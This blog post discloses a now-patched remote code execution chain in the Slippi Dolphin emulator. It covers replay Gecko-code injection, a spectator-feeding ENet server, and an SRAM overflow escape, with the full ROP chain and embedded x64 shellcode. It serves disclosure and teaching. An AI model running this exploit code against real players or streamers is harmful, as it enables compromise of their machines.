Slipping up Slippi with spectator RCE

This vulnerability is patched in Slippi Playback Dolphin 3.5.2, released January 14th, 2026. The launcher automatically updates it.

Super Smash Bros. Melee is a very popular party fighting game for the Nintendo GameCube. Despite three other entries (four if you're weird and count Smash 4 as two games) in the nearly 25 years since its release, Melee still enjoys a healthy competitive scene to this day due to its rushed development unintentionally leading to a fast-paced playstyle rarely seen in later, more casual-focused games. Major tournaments gather hundreds of players and sometimes even outnumber those playing the latest entry, Super Smash Bros. Ultimate!

Nowadays, most people want to play games with their friends over the internet, but since the GameCube was released when most people didn't have broadband, online play didn't exist for most of its library, including Melee. Of course, given that this is a game released on an old Nintendo console, it's safe to assume the majority of its players aren't playing exclusively on original hardware.

Instead, people play on Slippi.

Slippi is a Melee mod that deeply integrates with its own fork of the Dolphin GameCube/Wii emulator to bring automatic matchmaking, modern rollback netcode, and other quality-of-life improvements to an otherwise ancient console-only game. It's widely regarded as one of the main reasons Melee has maintained a consistent playerbase nowadays since it greatly lowers the barrier to entry for newcomers. Its netcode is also much, much better than the official online code in the later games (if you've ever played Ultimate against someone on Wi-Fi, you know how it feels).

Naturally, I wondered the same thing I do with anything else that interacts with random people on the internet:

Is there anything to exploit here?

Guest Code Execution

The first step toward any emulator escape shenanigans is getting my own code running inside the emulator in the first place. (Un)fortunately, I couldn't find anything exploitable in the main matchmaking modes, so instead I took a look at Slippi's replay system. The specification for Slippi's .slp replay format is publicly documented and available here.

One of the event types caught my eye:

Gecko codes are cheat codes, much like Action Replay or Game Genie codes. Despite being "cheat" codes, Gecko codes also get used as a general-purpose way of modding GameCube and Wii games. Slippi is no different here, as almost all of the patches it applies to Melee are applied as Gecko codes. Slippi also lets you use your own Gecko codes online, provided that they either don't change any gameplay mechanics or are also being used by your opponent (as scary as letting people use their own mods sounds, there aren't any random Super Pichus online since that would just lead to a desync). Storing Gecko codes in the replay file itself lets you play them back without needing to memorize what codes were used to record it, which is convenient for watching matches that used gameplay-altering codes.

Since Slippi happily loads any Gecko codes stored in a replay, running my own code from a replay file is fairly trivial because it's basically just a feature. All I have to do is write some shellcode to a random spot in memory and write a branch to it somewhere in game code. Easy!

Writing a big Gecko code list manually is annoying, so I used the gecko tool that's also used in Slippi's build system. Also, instead of writing my exploit code as self-contained shellcode, I decided to be lazy and use FIX94's gc-exploit-common-loader to chain from being in the middle of game code to loading a normal .dol executable I hardcoded somewhere else in memory. This lets me run my exploit code on its own during testing, then just copy it over to the replay loader later.

This gives me one really, really long Gecko code list:

$Entrypoint []
C216E750 00000007 #entry.S
7C6000A6 5463045E
7C600124 4C00012C
3C208000 60213000
38000000 9401FFC0
3C608000 60631800
7C6803A6 4E800020
60000000 00000000
04001800 7C6000A6
04001804 5463045E
04001808 60632000
0400180C 7C600124
04001810 4C00012C
...

Now, how exactly does this get written into the replay file? Unfortunately, the specification is a bit vague about how this gets formatted internally, so I had to do some poking around on my own. I used the peppi library to read and write Slippi replays, but it also doesn't fully parse the Gecko code section. Fortunately, the Gecko code event format is basically just a binary version of what's normally in a Gecko code file, with the size aligned to 512 bytes.

use std::{fs::File, io::BufReader};

use peppi::{game::GeckoCodes, io::slippi};

// Maybe it would be easier to use the GCT output here, idk
fn convert_codes() -> GeckoCodes {
    let file = std::fs::read_to_string("../entry.txt").unwrap();

    let mut bytes = vec![];
    for line in file.lines() {
        let line = line.trim();
        if line.starts_with('$') {
            continue;
        }

        let mut parts = line.split_once(' ').unwrap();
        if parts.1.len() > 8 {
            (parts.1, _) = parts.1.split_at(8);
        }
        let first = u32::from_str_radix(parts.0, 16).unwrap();
        let second = u32::from_str_radix(parts.1, 16).unwrap();

        bytes.extend_from_slice(&first.to_be_bytes());
        bytes.extend_from_slice(&second.to_be_bytes());
    }

    bytes.extend_from_slice(&[0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]);
    if bytes.len() % 512 != 0 {
        bytes.resize(((bytes.len() / 512) + 1) * 512, 0);
    }

    let actual_size = bytes.len() as u32;
    GeckoCodes { bytes, actual_size }
}

fn main() {
    let mut r = BufReader::new(File::open("../base.slp").unwrap());
    let mut game = slippi::read(&mut r, None).unwrap();

    game.start.slippi.version = slippi::MAX_SUPPORTED_VERSION;
    game.gecko_codes = Some(convert_codes());
    slippi::write(&mut File::create("../exploit.slp").unwrap(), &game).unwrap();
}

Finally, we have arbitrary guest code execution from a replay!

...Okay, arbitrary code execution from a replay you have to convince someone to download and watch is a bit boring. I said there would be remote code execution, right?

Spectator Mode

In addition to letting people play online matches in a way that isn't awful, Slippi also lets people watch online matches in a way that isn't awful.

Instead of requiring one of the players to screenshare on Discord to make their game watchable, Slippi's spectator mode sends just enough game state and input data to mirror the match onto another instance of Dolphin. This looks a lot better than a video stream while also using far less bandwidth, which is very much appreciated in a game that requires a half-decent internet connection. This is also commonly used by streamers running online tournaments for streaming and commentating matches, so an emulator escape that could be triggered purely from being a spectator would still be huge.

When starting a broadcast session, Slippi Launcher connects to an ENet server hosted by the Dolphin instance. Upon connecting, Dolphin starts sending the launcher a filtered selection of replay events, which the launcher then relays to a WebSocket hosted on Slippi's servers. On the receiving end, the launcher gets the replay events from the Slippi servers and streams them into a newly created .slp file, which the receiving Dolphin instance continuously tries to read events from.

So, in practice, spectator mode is basically just like reading any other replay file, but the events are being streamed instead. Since Gecko code events can also be sent to spectators, this means that arbitrary code can be executed inside the emulator in the same exact way, but it just has to be streamed to the server instead. Sounds easy enough.

To do this, I wrote a quick-and-dirty program that hosts its own ENet server and feeds Slippi Launcher replay events from a file instead.

use std::{
    collections::HashMap,
    fs::File,
    io::{BufReader, Cursor, Read, Seek, SeekFrom},
    net::{SocketAddr, UdpSocket},
    str::FromStr,
    time::Duration,
};

use base64::{Engine, prelude::BASE64_STANDARD};
use byteorder::ReadBytesExt;
use rusty_enet::{Event, Host, HostSettings, Packet};
use serde::{Deserialize, Serialize};

#[derive(Deserialize)]
#[serde(tag = "type")]
enum MirrorRequest {
    #[serde(rename = "connect_request")]
    ConnectRequest { cursor: usize },
}

#[derive(Serialize)]
#[serde(tag = "type")]
enum MirrorResponse<'a> {
    #[serde(rename = "connect_reply")]
    ConnectReply {
        nick: &'a str,
        version: &'a str,
        cursor: usize,
    },
    #[serde(rename = "start_game")]
    StartGame { cursor: usize, next_cursor: usize },
    #[serde(rename = "game_event")]
    GameEvent {
        payload: &'a str,
        cursor: usize,
        next_cursor: usize,
    },
}

fn main() {
    let socket = UdpSocket::bind(SocketAddr::from_str("0.0.0.0:51441").unwrap()).unwrap();
    let mut host = Host::new(
        socket,
        HostSettings {
            peer_limit: 4,
            channel_limit: 2,
            ..Default::default()
        },
    )
    .unwrap();

    println!("Ready!");
    loop {
        while let Ok(packet) = host.service()
            && let Some(event) = packet
        {
            match event {
                Event::Connect { peer, .. } => {
                    println!("Peer {} connected", peer.id().0);
                }
                Event::Disconnect { peer, .. } => {
                    println!("Peer {} disconnected", peer.id().0);
                }
                Event::Receive {
                    peer,
                    channel_id,
                    packet,
                } => {
                    if let Ok(message) = str::from_utf8(packet.data()) {
                        println!("Received packet: {message}");

                        let mut send_packet = |response: MirrorResponse| {
                            let response_json = serde_json::to_string(&response).unwrap();
                            println!("Sending packet: {response_json}");

                            let packet = Packet::reliable(response_json.as_bytes());
                            peer.send(channel_id, &packet).unwrap();
                        };

                        let request = serde_json::from_str::<MirrorRequest>(message).unwrap();
                        match request {
                            MirrorRequest::ConnectRequest { mut cursor } => {
                                println!("Sending reply");
                                send_packet(MirrorResponse::ConnectReply {
                                    nick: "Slippi Online",
                                    version: "3.5.1",
                                    cursor,
                                });

                                println!("Waiting a bit...");
                                std::thread::sleep(Duration::from_secs(10));

                                println!("Sending replay data...");
                                send_packet(MirrorResponse::StartGame {
                                    cursor,
                                    next_cursor: cursor + 1,
                                });
                                cursor += 1;

                                let mut cmd_lengths: HashMap<u8, u16> = HashMap::new();

                                let mut reader =
                                    BufReader::new(File::open("../gecko/exploit.slp").unwrap());
                                reader.seek(SeekFrom::Start(0xF)).unwrap();
                                loop {
                                    let cmd = reader.read_u8().unwrap();
                                    println!("Handling event 0x{cmd:X}");

                                    match cmd {
                                        // Event Payloads
                                        0x35 => {
                                            let size = reader.read_u8().unwrap();
                                            let event_buf = {
                                                let mut buf = vec![0u8; size as usize + 1];
                                                buf[0] = cmd;
                                                buf[1] = size;
                                                reader.read_exact(&mut buf[2..]).unwrap();
                                                buf
                                            };
                                            let mut event_reader = Cursor::new(&event_buf[2..]);

                                            for _ in 0..size / 3 {
                                                cmd_lengths.insert(
                                                    event_reader.read_u8().unwrap(),
                                                    event_reader
                                                        .read_u16::<byteorder::BigEndian>()
                                                        .unwrap(),
                                                );
                                            }

                                            let payload = BASE64_STANDARD.encode(&event_buf);
                                            send_packet(MirrorResponse::GameEvent {
                                                payload: &payload,
                                                cursor: cursor,
                                                next_cursor: cursor + 1,
                                            });
                                            cursor += 1;
                                        }
                                        x => {
                                            if let Some(&length) = cmd_lengths.get(&x) {
                                                let mut data = vec![0u8; length as usize + 1];
                                                data[0] = x;
                                                reader.read_exact(&mut data[1..]).unwrap();

                                                let payload = BASE64_STANDARD.encode(data);
                                                send_packet(MirrorResponse::GameEvent {
                                                    payload: &payload,
                                                    cursor: cursor,
                                                    next_cursor: cursor + 1,
                                                });
                                                cursor += 1;
                                            } else {
                                                println!("Unhandled command! Stopping...");
                                                break;
                                            }
                                        }
                                    }
                                }

                                println!("Should be done now!");
                            }
                        }
                    }
                }
            }
        }
        std::thread::sleep(Duration::from_millis(10));
    }
}

And with that, I now have a way of getting arbitrary guest code execution remotely! That was a lot of preparation work without any real exploits being written yet, but at least I can finally get to the fun part now.

Breaking out of Dolphin

When it comes to memory safety vulnerabilities, console emulators don't have the best track record (yes, those are all separate links). It's probably some combination of many popular ones having codebases dating back to the early 2000s, the need to emulate lots of different block copies for DMA, and there being more of a focus on just getting the games to work instead of hardening against potentially malicious code. Either way, I think there isn't enough vulnerability research that targets them, given that random ROM hacks or Totally Legitimately Acquired Game Backups also count as untrusted code.

Thankfully for me, in the case of Dolphin, I don't even have to find the vulnerability myself! One of the first changes mentioned in Dolphin's February, March, and April 2024 Progress Report is a patch for an easily controllable out-of-bounds read/write, followed by a few paragraphs about why patching these kinds of bugs is important.

The GameCube has a 64-byte region of battery-backed SRAM that it uses to keep track of some basic information like audio settings, screen offset, language (PAL only), and the real-time clock. All of this is configured in the GameCube's Initial Program Loader (IPL), also known as that big cube menu with all of the settings and memory card stuff.

This area isn't mapped directly in memory anywhere, but is instead accessed via the External Interface (EXI) bus. This means that data has to be copied to and from main memory via DMA in order to be accessed. Hey, didn't I say something about DMA in emulators leading to some issues earlier?

When an EXI DMA is started, Dolphin calls IEXIDevice::DMAWrite on the appropriate device.

void IEXIDevice::DMAWrite(u32 _uAddr, u32 _uSize)
{
    // _dbg_assert_(EXPANSIONINTERFACE, 0);
    while (_uSize--)
    {
        u8 uByte = Memory::Read_U8(_uAddr++);
        TransferByte(uByte);
    }
}

IEXIDevice::TransferByte is a virtual function overridden by each device, which in this case is CEXIIPL.

void CEXIIPL::TransferByte(u8& _uByte)
{
    // The first 4 bytes must be the address
    // If we haven't read it, do it now
    if (m_uPosition <= 3)
    {
        m_uAddress <<= 8;
        m_uAddress |= _uByte;
        m_uRWOffset = 0;
        _uByte = 0xFF;

        // Check if the command is complete
        if (m_uPosition == 3)
        {
            // Get the time...
            UpdateRTC();

            // ...
        }
    }
    else
    {
        // Actually read or write a byte
        switch (CommandRegion())
        {
        case REGION_RTC:
            if (IsWriteCommand())
                m_RTC[(m_uAddress & 0x03) + m_uRWOffset] = _uByte;
            else
                _uByte = m_RTC[(m_uAddress & 0x03) + m_uRWOffset];
            break;

        case REGION_SRAM:
            if (IsWriteCommand())
                g_SRAM.p_SRAM[(m_uAddress & 0x3F) + m_uRWOffset] = _uByte;
            else
                _uByte = g_SRAM.p_SRAM[(m_uAddress & 0x3F) + m_uRWOffset];
            break;

        // ...
        }

        m_uRWOffset++;
    }

    m_uPosition++;
}

m_uRWOffset is incremented for each byte accessed but is never checked against the bounds of m_RTC or p_SRAM, leading to a trivial out-of-bounds read and write primitive. To test this, I wrote a quick devkitPPC program that writes a lot of garbage into SRAM.

#include <string.h>
#include <gccore.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

int main() {
    static char dummy[1024];
    memset(dummy, 0x41, sizeof(dummy));
    __sram_write(dummy, sizeof(dummy));
}

A free bug that looks exploitable! Nice!

...Wait, that bug was patched two years ago. Why is this Dolphin vulnerable? To answer that, we need a short history lesson.

A long time ago, a developer named Tino created a fork of Dolphin called Ishiiruka, which aimed to be a fork that maintained support and improved performance on older hardware but at the cost of accuracy and stability due to some of the hacky workarounds it used. It hasn't been updated since around 2021 and seemed to diverge quite a bit from upstream even back then.

However, there was another fork of Dolphin called Faster Melee, which, as the name implies, was a fork of Dolphin based on Ishiiruka that was specifically tailored for getting better performance out of Dolphin with its built-in Netplay code on Melee. As you might've guessed from the fact that Slippi's Dolphin still says "Faster Melee" in its titlebar, this is what Slippi's build was forked off of. According to the commit history, it seems like FM was last synced with Ishiiruka all the way back in July 2017.

If you think being based on an ancient version of Dolphin from almost a decade ago sounds like it would be really annoying for the developers, you'd be completely right as far as I can tell. There's currently a work-in-progress port of Slippi to mainline Dolphin, but it's currently only considered an opt-in beta build. Also, Slippi uses two separate builds of Dolphin: one for actual gameplay and one for replay playback. The mainline Dolphin version currently only supports gameplay, so all replays are played back on Ishiiruka builds.

Anyway, back to figuring out how to exploit the bug. p_SRAM is just the raw byte array representation of the SRAM union and isn't a pointer:

union SRAM {
    u8 p_SRAM[64];
    struct  // Stored configuration value from the system SRAM area
    {
        u16 checksum;        // Holds the block checksum.
        u16 checksum_inv;    // Holds the inverse block checksum
        u32 ead0;            // Unknown attribute
        u32 ead1;            // Unknown attribute
        u32 counter_bias;    // Bias value for the realtime clock
        s8 display_offsetH;  // Pixel offset for the VI
        u8 ntd;              // Unknown attribute
        u8 lang;             // Language of system
        SRAMFlags flags;     // Device and operations flag

        // Stored configuration value from the extended SRAM area
        u8 flash_id[2][12];     // flash_id[2][12] 96bit memorycard unlock flash ID
        u32 wirelessKbd_id;     // Device ID of last connected wireless keyboard
        u16 wirelessPad_id[4];  // 16-bit device ID of last connected pad.
        u8 dvderr_code;         // last non-recoverable error from DVD interface
        u8 __padding0;          // reserved
        u8 flashID_chksum[2];   // 8-bit checksum of unlock flash ID
        u32 __padding1;         // padding
    };
};

And g_SRAM is defined as a global variable near the top of EXI.cpp, making this a static memory overflow:

// Copyright 2008 Dolphin Emulator Project
// Licensed under GPLv2+
// Refer to the license.txt file included.

// ...

SRAM g_SRAM;
bool g_SRAM_netplay_initialized = false;

namespace ExpansionInterface
{
// ...

Looking at a locally compiled build of Slippi Dolphin, these are the fields immediately following g_SRAM:

.data:0000000001BD7E30 ; SRAM g_SRAM
.data:0000000001BD7E30 ?g_SRAM@@3TSRAM@@A SRAM <?>             ; DATA XREF: Header::Header(int,ushort,bool)+46↑o
.data:0000000001BD7E30                                         ; NetPlayServer::OnConnect(_ENetPeer *)+3E4↑o ...
.data:0000000001BD7E70 ; bool g_SRAM_netplay_initialized
.data:0000000001BD7E70 ?g_SRAM_netplay_initialized@@3_NA db ?  ; DATA XREF: ExpansionInterface::Init(void)+1F↑r
.data:0000000001BD7E70                                         ; NetPlayServer::OnConnect(_ENetPeer *)+380↑r ...
.data:0000000001BD7E71                 align 8
.data:0000000001BD7E78 ; std::map<int,std::string> quickChatOptions_103
.data:0000000001BD7E78 quickChatOptions_103 std::map<int,std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::less<int>,std::allocator<std::pair<int const ,std::basic_string<char,std::char_traits<char>,std::allocator<char> > > > > <?>
.data:0000000001BD7E78                                         ; DATA XREF: _dynamic_initializer_for__quickChatOptions___103+81↑w
.data:0000000001BD7E78                                         ; _dynamic_initializer_for__quickChatOptions___103+AD↑w ...
.data:0000000001BD7E88 ; CoreTiming::EventType *ExpansionInterface::changeDevice
.data:0000000001BD7E88 ExpansionInterface__changeDevice dq ?   ; DATA XREF: ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+24↑r
.data:0000000001BD7E88                                         ; ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+43↑r ...
.data:0000000001BD7E90 ; CoreTiming::EventType *ExpansionInterface::updateInterrupts
.data:0000000001BD7E90 ExpansionInterface__updateInterrupts dq ?
.data:0000000001BD7E90                                         ; DATA XREF: ExpansionInterface::Init(void)+25B↑w
.data:0000000001BD7E90                                         ; ExpansionInterface::ScheduleUpdateInterrupts(CoreTiming::FromThread,int)+9↑r
.data:0000000001BD7E98 ; std::array<std::unique_ptr<CEXIChannel>,3> ExpansionInterface::g_Channels
.data:0000000001BD7E98 ExpansionInterface__g_Channels std::array<std::unique_ptr<CEXIChannel,std::default_delete<CEXIChannel> >,3> <?>
.data:0000000001BD7E98                                         ; DATA XREF: ExpansionInterface__ChangeDeviceCallback+20↑o
.data:0000000001BD7E98                                         ; ExpansionInterface::DoState(PointerWrap &)+12↑o ...

quickChatOptions doesn't appear to be a good corruption target since there wouldn't be any function pointers to mess with, and it's only used by a config menu that isn't even accessible in Playback builds. ExpansionInterface::changeDevice is a callback, which seems more promising, but it only gets called when an EXI device gets changed during emulation, which can only happen from the user messing with config menus or savestates. updateInterrupts is also a callback, but that only gets called from ethernet or microphone EXI devices, neither of which are enabled by default.

Finally, this leaves ExpansionInterface::g_Channels. CEXIChannel doesn't contain any function pointers on its own, but it does contain pointers to IEXIDevice objects, which have plenty of virtual functions to overwrite.

// Devices
enum
{
    NUM_DEVICES = 3
};

std::array<std::unique_ptr<IEXIDevice>, NUM_DEVICES> m_devices;

So, the plan here is to create a fake CEXIChannel populated with fake IEXIDevice objects with virtual functions that point to a ROP chain. Though, I'll have to figure out how to get the base addresses of both the main executable and the emulated main RAM before I can do any of that. It would be really nice if I didn't have to deal with leaking addresses, though...

Who am I kidding? This version of Dolphin is 64-bit and gets compiled with Visual Studio 2019. Obviously, there's gonna be ASLR! Still, I guess it doesn't hurt to check.

It turns out that Dolphin didn't have ASLR since a VS2013 update in 2013 and didn't get it back until June 2017. The last time Faster Melee synced with Ishiiruka was about a month after this pull request got merged, but they synced it with its "Stable" branch, which didn't have this commit in it. Ouch!

Anyway, I still need to find where the emulated main RAM is in memory to do anything useful, so let's see how I can get that.

Dolphin uses a very interesting method of ensuring that its emulated memory accesses are as fast as possible. Traditionally, given a hardcoded address map, an emulator would manually check the ranges on each memory access to see which region of memory it should go to. Doing this for every single memory access is quite slow, so Dolphin's developers came up with a trick called "Fastmem".

First, a massive 16GB region of address space is reserved (not allocated!). This doesn't give it any backing memory, but just reserves that part of the address space for use later.

u8* MemArena::FindMemoryBase()
{
    // Non-Win64 omitted
    u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE);
    VirtualFree(base, 0, MEM_RELEASE);
    return base;
}

Then, parts of that reserved region are carved out and allocated for the regions with backing memory.

static bool Memory_TryBase(u8* base, MemoryView* views, int num_views, u32 flags, MemArena* arena)
{
    // OK, we know where to find free space. Now grab it!
    // We just mimic the popular BAT setup.

    int i;
    for (i = 0; i < num_views; i++)
    {
        MemoryView* view = &views[i];
        void* view_base;
        bool use_sw_mirror;

        SKIP(flags, view->flags);

#if _ARCH_64
        // On 64-bit, we map the same file position multiple times, so we
        // don't need the software fallback for the mirrors.
        view_base = base + view->virtual_address;
        use_sw_mirror = false;
#else
        // On 32-bit, we don't have the actual address space to store all
        // the mirrors, so we just map the fallbacks somewhere in our address
        // space and use the software fallbacks for mirroring.
        view_base = base + (view->virtual_address & 0x3FFFFFFF);
        use_sw_mirror = true;
#endif

        if (use_sw_mirror && (view->flags & MV_MIRROR_PREVIOUS))
        {
            view->view_ptr = views[i - 1].view_ptr;
        }
        else
        {
            view->mapped_ptr = arena->CreateView(view->shm_position, view->size, view_base);
            view->view_ptr = view->mapped_ptr;
        }

        if (!view->view_ptr)
        {
            // Argh! ERROR! Free what we grabbed so far so we can try again.
            MemoryMap_Shutdown(views, i + 1, flags, arena);
            return false;
        }

        if (view->out_ptr)
            *(view->out_ptr) = (u8*)view->view_ptr;
    }

    return true;
}

Since that massive reserved block can fit the whole 32-bit address space (4GB for address translation off, 4GB for it on, and 4GB + 4GB of unmapped padding after them just in case), the JIT can then (ab)use the host's MMU to automatically translate addresses to the right place by using that region as a base for a 32-bit offset. If any memory access hits unmapped host memory (e.g., MMIO) within that region, the JIT goes and patches the memory access to use the slower method and tries again. Since most memory accesses only access main RAM, this is a net win!

Fastmem is a really cool optimization, but how does that help with the exploit? Well, despite having a whole 48 bits of address space to work with, Windows only ever seems to try to reserve that massive chunk of memory at the lowest address it can. There isn't a whole lot allocated by Dolphin or any of its libraries before booting a game, so there isn't much fragmentation in the address space. Near the top of that 32-bit address space is KUSER_SHARED_DATA, which is always at 0x7FFEF000 no matter what. There's a massive gap in address space between the end of KUSER_SHARED_DATA and the DLLs that get loaded in the 0x007FF... range due to ASLR, so where does Windows put the Fastmem arena?

Right after KUSER_SHARED_DATA at 0x7FFFF000 every single time, of course! This isn't a fluke; it really is this consistent on all of the PCs I've tested.

Now that I know that I don't need any leaks, let's start poking around with this fake CEXIChannel.

#include <string.h>
#include <gccore.h>
#include <ogc/machine/processor.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

typedef struct {
    u8 gap0[0x18];
    u64 m_devices[3]; // IEXIDevice*[3]
    u8 gap30[0x8];
} CEXIChannel;
static_assert(sizeof(CEXIChannel) == 0x38);

#define RAM_BASE 0x7FFF0000uL
#define TARGET_PTR_OFFSET 0x58

static u64 guest_to_host_addr(const void* input) {
    return RAM_BASE + ((u32)input & 0x7FFFFFFF);
}

int main() {
    u8 fake_vtbl[256];
    for (int i = 0; i < 256; i++)
        fake_vtbl[i] = i;
    
    // Addresses have to be byteswapped because PowerPC is big endian
    u64 fake_device = bswap64(guest_to_host_addr(&fake_vtbl));
    
    CEXIChannel fake_channel;
    memset(&fake_channel, 0x99, sizeof(fake_channel));
    for (int i = 0; i < 3; i++)
        fake_channel.m_devices[i] = bswap64(guest_to_host_addr(&fake_device));

    // Overwrites g_Channels[0]
    static char buf[TARGET_PTR_OFFSET + 8];
    u64 ptr = bswap64(guest_to_host_addr(&fake_channel));
    memcpy(buf + TARGET_PTR_OFFSET, &ptr, sizeof(ptr));
    __sram_write(buf, sizeof(buf));
}

Running this shows that there's a trivially controllable virtual call. Nice!

Specifically, this is happening in ExpansionInterface::UpdateInterrupts(), which gets called immediately after the broken DMA transfer completes. IsInterruptSet is the controllable virtual call on the fake IEXIDevice object.

void UpdateInterrupts()
{
	// Interrupts are mapped a bit strangely:
	// Channel 0 Device 0 generates interrupt on channel 0
	// Channel 0 Device 2 generates interrupt on channel 2
	// Channel 1 Device 0 generates interrupt on channel 1
	g_Channels[2]->SetEXIINT(g_Channels[0]->GetDevice(4)->IsInterruptSet());

	bool causeInt = false;
	for (auto& channel : g_Channels)
		causeInt |= channel->IsCausingInterrupt();

	ProcessorInterface::SetInterrupt(ProcessorInterface::INT_CAUSE_EXI, causeInt);
}

I'm not going to go through the whole process of how I wrote the ROP chain for this since that isn't very interesting, but here's the final exploit code:

#include <string.h>
#include <gccore.h>
#include <ogc/machine/processor.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

typedef struct {
    u8 gap0[0x18];
    u64 m_devices[3]; // IEXIDevice*[3]
    u8 gap30[0x8];
} CEXIChannel;
static_assert(sizeof(CEXIChannel) == 0x38);

#define RAM_BASE 0x7FFF0000uL
#define TARGET_PTR_OFFSET 0x58

static u64 guest_to_host_addr(const void* input) {
    return RAM_BASE + ((u32)input & 0x7FFFFFFF);
}

// Don't feel like writing my own calc shellcode for this
// https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm
static const u8 shellcode[] =
    "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
    "\x48\x83\xec\x20\x41\xff\xd6\xcc";

int main() {
    u64 rop_3[] __attribute__((aligned(16))) = {
        // pop rdx; ret
        0x4C06B2,
        guest_to_host_addr(shellcode),

        // pop r8; ret
        0x4EE16B,
        sizeof(shellcode),
        
        // memcpy
        0xEB7E52,
        
        // call rax
        0x41CFE9,
        
        0,
        0,
        
        // Call from rop_2 points here
        // xchg esp, edx; ret
        0x898285,
    };
    for (int i = 0; i < sizeof(rop_3) / sizeof(rop_3[0]); i++)
        rop_3[i] = bswap64(rop_3[i]);
    
    u64 rop_2[] __attribute__((aligned(16))) = {
        // pop rcx; ret
        0x52ABB3,
        sizeof(shellcode),
        
        // Common::AllocateExecutableMemory
        // Second argument doesn't matter
        0xFD2F70,
        
        // add rsp, 0x38; ret
        0x40C3DE,
        0, 0, 0, 0, 0, 0, 0,

        // pop rdx; ret
        0x4C06B2,
        guest_to_host_addr(rop_3),
        
        // mov rcx, rax; call qword ptr [rdx+40h]
        0x10EE58A
    };
    for (int i = 0; i < sizeof(rop_2) / sizeof(rop_2[0]); i++)
        rop_2[i] = bswap64(rop_2[i]);

    // Since rdx points here, this doubles as the first ROP chain
    u64 fake_vtbl[] __attribute__((aligned(16))) = {
        // pop rax; ret
        0x4179B0,
        guest_to_host_addr(rop_2),

        // mov rsp, rax; ret
        0x40EAB0,

        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,

        // Initial call points here
        // xchg esp, edx; ret
        0x898285,
    };
    for (int i = 0; i < sizeof(fake_vtbl) / sizeof(fake_vtbl[0]); i++)
        fake_vtbl[i] = bswap64(fake_vtbl[i]);

    u64 fake_device = bswap64(guest_to_host_addr(fake_vtbl));
    
    CEXIChannel fake_channel;
    memset(&fake_channel, 0x99, sizeof(fake_channel));
    for (int i = 0; i < 3; i++)
        fake_channel.m_devices[i] = bswap64(guest_to_host_addr(&fake_device));

    // Overwrites g_Channels[0]
    static char buf[TARGET_PTR_OFFSET + 8];
    u64 ptr = bswap64(guest_to_host_addr(&fake_channel));
    memcpy(buf + TARGET_PTR_OFFSET, &ptr, sizeof(ptr));
    __sram_write(buf, sizeof(buf));
}

A few notes on it:

  • That xchg esp, edx; ret stack pivot gadget works because the Fastmem arena gets allocated at a low enough address for main RAM to fit within the first 4GB of address space.
  • The mov rsp, rax; ret isn't a lucky desynced instruction but is actually the end of ff_put_h264_chroma_mc8_rnd_mmx. No idea why it's there, but it's a great gadget, so I can't complain.
  • Exploiting an emulator with a JIT means that I get convenient functions like Common::AllocateExecutableMemory for getting RWX memory instead of having to VirtualAlloc it myself.

I hope you had as much fun reading this as I did working on it! This was something I wanted to write back in January, but I put it off until now. What really pushed me to write this post was getting extremely annoyed at the number of clearly LLM-generated technical blog posts I kept seeing. I figured the only way to get more half-decent posts in the world is to start writing them myself again.

Thanks to Fizzi for the quick response in getting this vulnerability fixed.